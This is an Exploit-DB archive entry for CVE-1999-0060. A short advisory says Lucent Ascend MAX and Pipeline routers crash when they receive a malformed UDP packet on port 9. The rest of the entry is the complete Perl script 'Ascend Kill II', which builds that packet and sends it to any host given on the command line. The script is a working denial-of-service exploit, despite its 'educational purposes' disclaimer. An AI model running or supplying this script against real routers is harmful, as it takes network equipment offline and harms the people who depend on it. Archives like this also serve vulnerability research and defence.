Lucent Ascend MAX <= 5.0/Pipeline <= 6.0/TNT 1.0/2.0 Router MAX UDP Port 9 Vulnerability 2

1998-03-17T00:00:00
ID EDB-ID:19555
Type exploitdb
Reporter Rootshell
Modified 1998-03-17T00:00:00

Description

Lucent Ascend MAX Router 5.0/Pipeline Router 6.0/TNT Router 1.0/2.0 MAX UDP Port 9 Vulnerability (2). CVE-1999-0060. Remote exploit for hardware platform

                                        
                                            source: http://www.securityfocus.com/bid/714/info
 
Certain versions of Ascends (Lucent) router software listen on port 9 (UDP Discard). Ascend provides configuration tools for MAX and Pipeline routers that locate locally installed routers by broadcasting a specially formatted packet to UDP port 9. An attacker can send a similar but malformed packet to the same port that will cause MAX and Pipeline routers running certain software versions to crash. 

#!/usr/bin/perl

                    #
                    # Ascend Kill II - perl version
                    # (C) 1998 Rootshell - http://www.rootshell.com/ - <info@rootshell.com>
                    #
                    # Released: 3/17/98
                    #
                    # Thanks to Secure Networks.  See SNI-26: Ascend Router Security Issues
                    # (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
                    #
                    #  NOTE: This program is NOT to be used for malicous purposes.  This is
                    #        intenteded for educational purposes only.  By using this program
                    #        you agree to use this for lawfull purposes ONLY.
                    #
                    #

                    use Socket;

                    require "getopts.pl";

                    sub AF_INET {2;}
                    sub SOCK_DGRAM {2;}

                    sub ascend_kill {
                      $remotehost = shift(@_);
                      chop($hostname = `hostname`);
                      $port = 9;
                      $SIG{'INT'} = 'dokill';
                      $sockaddr = 'S n a4 x8';
                      ($pname, $aliases, $proto) = getprotobyname('tcp');
                      ($pname, $aliases, $port) = getservbyname($port, 'tcp')
                      unless $port =~ /^\d+$/;
                      ($pname, $aliases, $ptype, $len, $thisaddr) =
                      gethostbyname($hostname);
                      $this = pack($sockaddr, AF_INET, 0, $thisaddr);
                      ($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost);
                      $that = pack($sockaddr, AF_INET, $port, $thataddr);
                      socket(S, &AF_INET, &SOCK_DGRAM, 0);
                        $msg = pack("c64",
                        0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
                        0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
                        0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
                        0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
                        0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
                        0x50, 0x41, 0x53, 0x53);
                      for ($i=0; $i<500; $i++) {
                        $msg .= pack("c1", 0xff);
                      }
                      send(S,$msg,0,$that) || die "send:$!";
                    }

                    if ($ARGV[0] eq '') {
                      print "usage: akill2.pl <remote_host>\n";
                      exit;
                    }

                    &ascend_kill($ARGV[0]);